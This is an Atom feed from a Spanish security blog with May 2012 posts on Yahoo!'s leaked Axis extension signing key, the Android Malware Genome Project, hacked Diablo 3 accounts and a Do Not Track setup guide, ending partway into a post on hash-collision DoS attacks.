<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0"><id>tag:blogger.com,1999:blog-9133539773684103848</id><updated>2012-05-26T02:46:55.259+02:00</updated><category term="esteganografía" /><category term="vulnerabilidades" /><category term="flash" /><category term="amenazas" /><category term="formación" /><category term="gadgets" /><category term="apple" /><category term="malware" /><category term="móvil" /><category term="técnicas" /><category term="curiosidades" /><category term="cracking" /><category term="libros" /><category term="recursos" /><category term="encuestas" /><category term="pwned" /><category term="foca" /><category term="tutoriales" /><category term="seguridad gestionada" /><category term="dos" /><category term="retos" /><category term="fortificación" /><category term="recomendaciones" /><category term="redes" /><category term="hardware" /><category term="inyecciones SQL" /><category term="humor" /><category term="linux" /><category term="criptografía" /><category term="ingeniería inversa" /><category term="lock picking" /><category term="entrevistas" /><category term="metodologías" /><category term="videos" /><category term="trivial" /><category term="metasploit" /><category term="normativas" /><category term="forense" /><category term="herramientas" /><category term="contramedidas" /><category term="metadatos" /><category term="legislación" /><category term="promociones" /><category term="off-topic" /><category term="android" /><category term="antivirus" /><category term="programación" /><category term="certificaciones" /><category term="exploits" /><category term="defaces" /><category term="recopilatorios" /><category term="wireless" /><category term="noticias" /><category term="magazines" /><category term="eventos" /><category term="hacktivismo" /><category term="maps" /><category term="pentest" /><category term="web recomendada" /><category term="infografías" /><category term="ipv6" /><title type="text">hackplayers</title><subtitle type="html">Computer security, ethical hacking and more!</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://www.hackplayers.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default?start-index=11&amp;max-results=10" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>635</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>10</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/Hackplayers" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="hackplayers" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">Hackplayers</feedburner:emailServiceId><feedburner:feedburnerHostname xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">http://feedburner.google.com</feedburner:feedburnerHostname><entry><id>tag:blogger.com,1999:blog-9133539773684103848.post-1448395441703950834</id><published>2012-05-24T16:25:00.001+02:00</published><updated>2012-05-24T16:25:11.555+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="vulnerabilidades" /><category scheme="http://www.blogger.com/atom/ns#" term="pwned" /><title type="text">Yahoo! expone su clave privada dentro de la extensión Axis para Chrome</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Sby1K0A1lxw/T75EqJ7oJDI/AAAAAAAAEyE/BvWdZgmTOC0/s1600/yahoo_pem_leaked.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="198" src="http://1.bp.blogspot.com/-Sby1K0A1lxw/T75EqJ7oJDI/AAAAAAAAEyE/BvWdZgmTOC0/s320/yahoo_pem_leaked.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;b&gt;Yahoo!&lt;/b&gt; acaba de anunciar su nuevo navegador &lt;a href="http://axis.yahoo.com/" target="_blank"&gt;Axis&lt;/a&gt; implementado como una extensión para Chrome, Firefox e Internet Explorer y no lo han estrenado precisamente bien: han dejado la &lt;b&gt;clave privada&lt;/b&gt; para firmar la extensión dentro del propio paquete de la &lt;b&gt;extensión de Chrome&lt;/b&gt;.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;El australiano Nik Cubrilovic explicaba en su &lt;a href="http://nikcub.appspot.com/posts/yahoo-axis-chrome-extension-leaks-private-certificate-file" target="_blank"&gt;blog&lt;/a&gt; que al revisar el código encontró el &lt;b&gt;fichero .pem&lt;/b&gt;, el certificado que usa Yahoo! para firmar su extensión y para que Chrome pueda comprobar su autenticidad.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;El resultado es que con la clave privada cualquier atacante podría crear una extensión para Chrome y el navegador "confiaría" en ella creyendo que proviene de Yahoo!.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Para demostrar además la vulnerabilidad, Nik ha creado una extensión de prueba con una alerta en javascript firmada con este certificado privado. El código lo podéis encontrar en un &lt;a href="http://github.com/nikcub/yahoo-spoof" target="_blank"&gt;repositorio en GitHub&lt;/a&gt;. Si lo probáis, veréis que al pinchar el &lt;a href="https://github.com/nikcub/yahoo-spoof/raw/master/build/yahoo-spoof.crx" target="_blank"&gt;enlace&lt;/a&gt; la extensión se instalará directamente en Chrome.&lt;/span&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;br style="font-family: Verdana,sans-serif;" /&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;Imaginaros una extensión falsa que capture el tráfico web (incluidas las contraseñas) y que, por ejemplo, se instalara en los usuarios al falsificar la entrada DNS de la URL de actualización...&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9133539773684103848-1448395441703950834?l=www.hackplayers.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.hackplayers.com/feeds/1448395441703950834/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=9133539773684103848&amp;postID=1448395441703950834" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/1448395441703950834" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/1448395441703950834" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/2012/05/yahoo-expone-su-clave-privada-dentro-de.html" title="Yahoo! expone su clave privada dentro de la extensión Axis para Chrome" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-Sby1K0A1lxw/T75EqJ7oJDI/AAAAAAAAEyE/BvWdZgmTOC0/s72-c/yahoo_pem_leaked.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-9133539773684103848.post-2722944258975129136</id><published>2012-05-23T10:50:00.000+02:00</published><updated>2012-05-23T10:59:35.741+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="malware" /><category scheme="http://www.blogger.com/atom/ns#" term="android" /><title type="text">Proyecto Genoma de Malware para Android</title><content type="html">&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;a href="http://1.bp.blogspot.com/-_QjkMUy2ymw/T7ykr8fqHvI/AAAAAAAAExs/448qJkJoL4w/s1600/Android+Malware+Genome+Project.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-_QjkMUy2ymw/T7ykr8fqHvI/AAAAAAAAExs/448qJkJoL4w/s200/Android+Malware+Genome+Project.png" width="190" /&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;Los investigadores de seguridad en dispositivos móviles reclaman un esfuerzo global para compartir datos sobre malware dirigido a la plataforma Android con el objetivo de mejorar la capacidad de defenderse contra estos ataques.&lt;br /&gt;&lt;br /&gt;El &lt;a href="http://www.malgenomeproject.org/" target="_blank"&gt;&lt;b&gt;Proyecto Genoma de Malware para Android&lt;/b&gt;&lt;/a&gt; ha sido creado por Yajin Zhou y Xuxian Jiang, investigadores de la North Carolina State, y ya ha recogido más de 1.200 piezas de malware. El proyecto está diseñado para compartir todo el código relacionado con el malware en Android con el objetivo de facilitar la investigación de seguridad. Jiang y su equipo han sido los primeros en identificar docenas de aplicaciones de malware, incluyendo DroidKungFu y GingerMaster.&lt;br /&gt;&lt;br /&gt;Jiang anunció el proyecto el 22 de mayo en el &lt;a href="http://www.ieee-security.org/TC/SP2012/" target="_blank"&gt;Simposio IEEE sobre Seguridad y Privacidad en San Francisco&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;El proyecto es importante, dice Jiang, ya que "&lt;i&gt;nuestra capacidad de defensa está muy restringida por la limitada comprensión del malware móvil&lt;/i&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt; emergente &lt;/i&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt; y la oportuna falta de acceso a muestras relacionadas. Nuestra comunidad de investigación tiene que hacer un mejor trabajo para el intercambio de datos, si queremos desarrollar a tiempo la próxima generación de soluciones de seguridad móvil.&lt;/i&gt;"&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Fuente: &lt;a href="http://web.ncsu.edu/abstract/technology/wms-android-genome/" target="_blank"&gt;Announcing the Android Malware Genome Project&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9133539773684103848-2722944258975129136?l=www.hackplayers.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.hackplayers.com/feeds/2722944258975129136/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=9133539773684103848&amp;postID=2722944258975129136" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/2722944258975129136" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/2722944258975129136" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/2012/05/los-investigadores-de-seguridad-en.html" title="Proyecto Genoma de Malware para Android" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-_QjkMUy2ymw/T7ykr8fqHvI/AAAAAAAAExs/448qJkJoL4w/s72-c/Android+Malware+Genome+Project.png" height="72" width="72" /><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-9133539773684103848.post-8676849300461249262</id><published>2012-05-22T18:25:00.002+02:00</published><updated>2012-05-22T18:54:14.635+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="noticias" /><category scheme="http://www.blogger.com/atom/ns#" term="pwned" /><title type="text">Comprometidas multitud de cuentas de Diablo 3</title><content type="html">&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;a href="http://4.bp.blogspot.com/-kiaNwuXsIuQ/T7u-aSNBhoI/AAAAAAAAEuQ/u7VggpDJivc/s1600/diablo-3-caja.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="225" src="http://4.bp.blogspot.com/-kiaNwuXsIuQ/T7u-aSNBhoI/AAAAAAAAEuQ/u7VggpDJivc/s200/diablo-3-caja.jpg" width="225" /&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;Al parecer Blizzard ha sido objeto de un importante ataque que dio como resultado el robo de cuentas de &lt;b&gt;Diablo 3&lt;/b&gt; (o items de cuentas) durante los días 19 y 20 de mayo. Probablemente este ataque fue la razón de que muchos servidores europeos fueran cerrados durante unas cuatro horas.&lt;br /&gt;&lt;br /&gt;Muchos jugadores se han quejado de la falta de información en el foro de &lt;b&gt;Battle.net&lt;/b&gt; oficial, donde circulan rumores acerca de inyecciones SQL, secuestro de sesiones e incluso phising. Parece que los usuarios que registraron actividad con otros jugadores como “leyiong”, “Nevin”, “SBJunkie”, “luckllezz (George Melchers)”, “McLeast” o incluso otros desconocidos podrían haber sido comprometidos. &lt;br /&gt;&lt;br /&gt;Para todos Blizzard recomienda visitar cambiar la contraseña y usar el &lt;a href="http://us.battle.net/support/en/article/battle-net-authenticator-faq" target="_blank"&gt;autenticador&lt;/a&gt;. No obstante algunos jugadores que usan el autenticador también han sido hackeados, por lo que cobra fuerza que los atacantes han podido explotar una vulnerabilidad en el lado del servidor. Estaremos atentos a más noticias :)&lt;/span&gt;&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;Referencias:&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.eurogamer.net/articles/2012-05-22-blizzard-addresses-diablo-3-account-hacks-outlines-security-measures" target="_blank"&gt;- Blizzard addresses Diablo 3 account hacks, outlines security measures &lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.cinemablend.com/games/Diablo-3-Hacked-Accounts-Reason-Enough-An-Offline-Mode-42755.html" target="_blank"&gt;- Diablo 3 Hacked Accounts Are Reason Enough For An Offline Mode&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://freethoughtblogs.com/zingularity/2012/05/21/stolen-handshakes-session-id-hijacking/" target="_blank"&gt;- Stolen handshakes: session ID hijacking rumors in Diablo III may be overblown&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.forbes.com/sites/erikkain/2012/05/21/breaking-blizzard-diablo-iii-player-accounts-hacked-items-and-gold-stolen/" target="_blank"&gt;- Blizzard Breached: 'Diablo III' Player Accounts Hacked, Items and Gold Stolen [Updated]&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-fqrItwsAQuU/T7u9B4quwRI/AAAAAAAAEt4/8k0DNfl00KQ/s1600/diablo-3-pantalla.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.examiner.com/article/accounts-on-diablo-3-hacked" style="font-family: Verdana,sans-serif;" target="_blank"&gt;- Accounts on Diablo 3 hacked&lt;/a&gt;&lt;/span&gt;...&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.pcgamer.com/2012/05/22/diablo-3-accounts-hacked-items-stolen-real-money-auction-house-due-next-week/" target="_blank"&gt;&lt;span style="font-family: Verdana,sans-serif;"&gt;- Diablo 3 accounts hacked, items stolen, real money auction house due next week &lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9133539773684103848-8676849300461249262?l=www.hackplayers.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.hackplayers.com/feeds/8676849300461249262/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=9133539773684103848&amp;postID=8676849300461249262" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/8676849300461249262" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/8676849300461249262" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/2012/05/comprometidas-multitud-de-cuentas-de.html" title="Comprometidas multitud de cuentas de Diablo 3" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-kiaNwuXsIuQ/T7u-aSNBhoI/AAAAAAAAEuQ/u7VggpDJivc/s72-c/diablo-3-caja.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-9133539773684103848.post-778233299566529831</id><published>2012-05-21T16:26:00.000+02:00</published><updated>2012-05-21T16:29:54.695+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="tutoriales" /><title type="text">No me rastreen, gracias: Do Not Track (DNT)</title><content type="html">&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;a href="http://1.bp.blogspot.com/-44q3o92NLPU/T7pOn1a-AxI/AAAAAAAAEts/QvTT3IySEgs/s1600/Do-not-track.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-44q3o92NLPU/T7pOn1a-AxI/AAAAAAAAEts/QvTT3IySEgs/s200/Do-not-track.jpg" width="170" /&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;Como muchos sabréis &lt;b&gt;Do Not Track (DNT)&lt;/b&gt; es una iniciativa para permitir a los usuarios decidir si quieren ser o no rastreados en Internet. Fue impulsada por Mozilla (&lt;a href="http://people.mozilla.org/%7Etlowenthal/resources/mozilla_dnt-field-guide.pdf" target="_blank"&gt;guía de campo&lt;/a&gt;), apoyada por la Federación de Comercio estadounidense y gracias al consorcio W3C se convertirá en estándar web en octubre de este año. Ya ha sido apoyada por Google, Opera, Microsoft y recientemente ha sido también &lt;a href="http://twitter.com/privacy#widget-jump" target="_blank"&gt;incluida en Twitter&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Y si crees que el rastreo en Internet no es importante o es poca cosa, te invitamos a probar la extensión de Firefox &lt;a href="https://www.mozilla.org/en-US/collusion/" target="_blank"&gt;Collusion&lt;/a&gt;. Con ella podrás crear un mapa interactivo a partir del sitio que estés visitando, mostrando en tiempo real las páginas que utilizan cookies de terceros para rastrear tu actividad y cómo éstas interaccionan con las principales compañías de seguimiento, compartiendo la información de todos tus movimientos. &lt;br /&gt;&lt;br /&gt;Así que, si quieres activarlo en tu navegador para mantener la privacidad en sitios que permitan DNT, sólo tendrás que seguir unos sencillos pasos:&lt;/span&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="font-family: Verdana,sans-serif;"&gt;  &lt;span style="font-size: small;"&gt;Si estás usando Firefox 5:&lt;/span&gt;&lt;/h3&gt;&lt;ol style="font-family: Verdana,sans-serif;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Abre el menú de preferencias y haz clic en &lt;b&gt;Privacidad&lt;/b&gt;.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Marca la casilla &lt;b&gt;Decirle a los sitios web que no quiero ser rastreado.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;img height="194px;" src="https://lh5.googleusercontent.com/cIQjAxcuQQ7oV9QA0eaKrNGaLGvB-SI2o0YOqmI5w9BHs4lMoo3xPU3US6m4nOw6Fao9Gw7fkx6jNazEAyk2MGZPmQmrTKSRnYBvlxvPzg5LReULgKE" width="620px;" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;h3 style="font-family: Verdana,sans-serif;"&gt;   &lt;span style="font-size: small;"&gt;&lt;br /&gt;Si estás usando Internet Explorer 9:&lt;/span&gt;&lt;/h3&gt;&lt;ol style="font-family: Verdana,sans-serif;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Visita esta &lt;a href="http://ie.microsoft.com/testdrive/Browser/DoNotTrack/Default.html"&gt;página de test de Do Not Track&lt;/a&gt; para información de cómo configurar Internet Explorer 9, y abajo haz clic para añadir una lista de protección de rastreo vacía (&lt;/span&gt;&lt;i&gt;&lt;a href="http://www.blogger.com/blogger.g?blogID=9133539773684103848"&gt;Click here to add an empty Tracking Protection list&lt;/a&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;).&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Cuando se muestre la ventana de dialogo, haz clic en el botón &lt;b&gt;Añadir Lista.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Para más detalle consulta la &lt;a href="http://ie.microsoft.com/testdrive/Browser/DoNotTrack/Default.html"&gt;página de ayuda&lt;/a&gt; de Microsoft.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;img height="224px;" src="https://lh3.googleusercontent.com/_Sh64VZPTnk9jqVVnIWXF-39uSHF2IwixPIwa0POZPOhwMPmeBu0EfiUO_j_3LBVAEKyWeWir4EGCdMSeFlXjVpS116qLBdPVkkV7fvvPRY2aS87MO8" width="520px;" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;h3 style="font-family: Verdana,sans-serif;"&gt;  &lt;span style="font-size: small;"&gt;Si estás usando Safari 5.1:&lt;/span&gt;&lt;/h3&gt;&lt;ol style="font-family: Verdana,sans-serif;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;En las preferencias de Safari, clic en &lt;b&gt;Avanzado.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;A continuación, marca la casilla &lt;b&gt;Mostrar el menú de desarrollo en la barra de menú&lt;/b&gt; (imagen 1, abajo).&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Cierra la ventana de preferencias, y en el nuevo menú de desarrollo, selecciona &lt;b&gt;Enviar cabecera HTTP Do Not Track &lt;/b&gt;(imagen 2).&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;img height="325px;" src="https://lh3.googleusercontent.com/DkCoowX4CEi4AzSh7r9xXEepMJ3gdAf1TEKl21x57DNkHAp5Ra1w_GLL8CHRjT2thvgW7Fd_sZpQGVJaX-WEAwNixJx0eOuFWYL0IwdgUDZ8GOMHdIo" width="647px;" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;img height="411px;" src="https://lh6.googleusercontent.com/zGKqF_GXtWEu8oyjmdeeRHcy-he3Z4EJJD5uBEn8XtgwjG3qObbzc2OxZXDIzr2CKHLVIZRShkkH1vS3WWlveF7K446_iHXPOzumRFTyAXpf00FzlX8" width="304px;" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;h3 style="font-family: Verdana,sans-serif;"&gt;  &lt;span style="font-size: small;"&gt;Si estás usando Chrome 17.0 o superior, hay un extensión que habilita DNT:&lt;/span&gt;&lt;/h3&gt;&lt;ol style="font-family: Verdana,sans-serif;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Abre Chrome, y selecciona &lt;b&gt;Extensiones&lt;/b&gt;.&amp;nbsp; &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Haz clic en el enlace para&amp;nbsp; &lt;b&gt;Obtener más extensiones&lt;/b&gt;.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Busca &lt;a href="https://chrome.google.com/webstore/detail/ckdcpbflcbeillmamogkpmdhnbeggfja"&gt;“Do Not Track” de Jonathan Mayer&lt;/a&gt;.  &amp;nbsp;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Para añadir "Do Not Track” a tu navegador Chrome, haz clic en &lt;b&gt;Añadir a Chrome&lt;/b&gt; y haz clic en añadir otra vez cuando veas el &lt;i&gt;disclaimer&lt;/i&gt;.&amp;nbsp;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Vuelve a las extensiones y asegúrate que se ha añadido y activado correctamente.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;img height="147px;" src="https://lh5.googleusercontent.com/3bXNtQqdeqt8PoYGEqgkaoNvYjHaMPOD9VORMb0V5mMRhA77in6kEY5sJyieLtgLQPHisyCJqDuJgavYfr5fcxxeW087GSybCR2vQbk83Qd-_9Awgu4" width="653px;" /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9133539773684103848-778233299566529831?l=www.hackplayers.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.hackplayers.com/feeds/778233299566529831/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=9133539773684103848&amp;postID=778233299566529831" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/778233299566529831" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9133539773684103848/posts/default/778233299566529831" /><link rel="alternate" type="text/html" href="http://www.hackplayers.com/2012/05/no-me-rastreen-gracias-do-not-track-dnt.html" title="No me rastreen, gracias: Do Not Track (DNT)" /><author><name>Vicente Motos</name><uri>http://www.blogger.com/profile/03053036399006390105</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="24" height="32" src="http://4.bp.blogspot.com/-vOYTWqyujbI/TVRiEhZb0NI/AAAAAAAABTs/Dy1-E5Vl6W4/s220/CameraFun%2B-%2B2011-02-10%2B23.00.34.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-44q3o92NLPU/T7pOn1a-AxI/AAAAAAAAEts/QvTT3IySEgs/s72-c/Do-not-track.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-9133539773684103848.post-8398664782072782125</id><published>2012-05-18T02:00:00.000+02:00</published><updated>2012-05-18T11:30:06.906+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="herramientas" /><category scheme="http://www.blogger.com/atom/ns#" term="dos" /><title type="text">Ataques DoS efectivos mediante colisiones de hashes</title><content type="html">&lt;a href="http://1.bp.blogspot.com/-s314V0HWZb4/T7YWVJl8FcI/AAAAAAAAEtg/l7oQJ4Arkv4/s1600/huella_hash.png" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="192" kba="true" src="http://1.bp.blogspot.com/-s314V0HWZb4/T7YWVJl8FcI/AAAAAAAAEtg/l7oQJ4Arkv4/s320/huella_hash.png" width="320" /&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Verdana, sans-serif;"&gt;Durante la conferencia &lt;b&gt;28c3 (28th Chaos Communication Congress)&lt;/b&gt; de finales del año pasado en Berlín, Alexander “alech” Klink y Julian “zeri” Wälde ofrecieron una interesante charla titulada "&lt;a 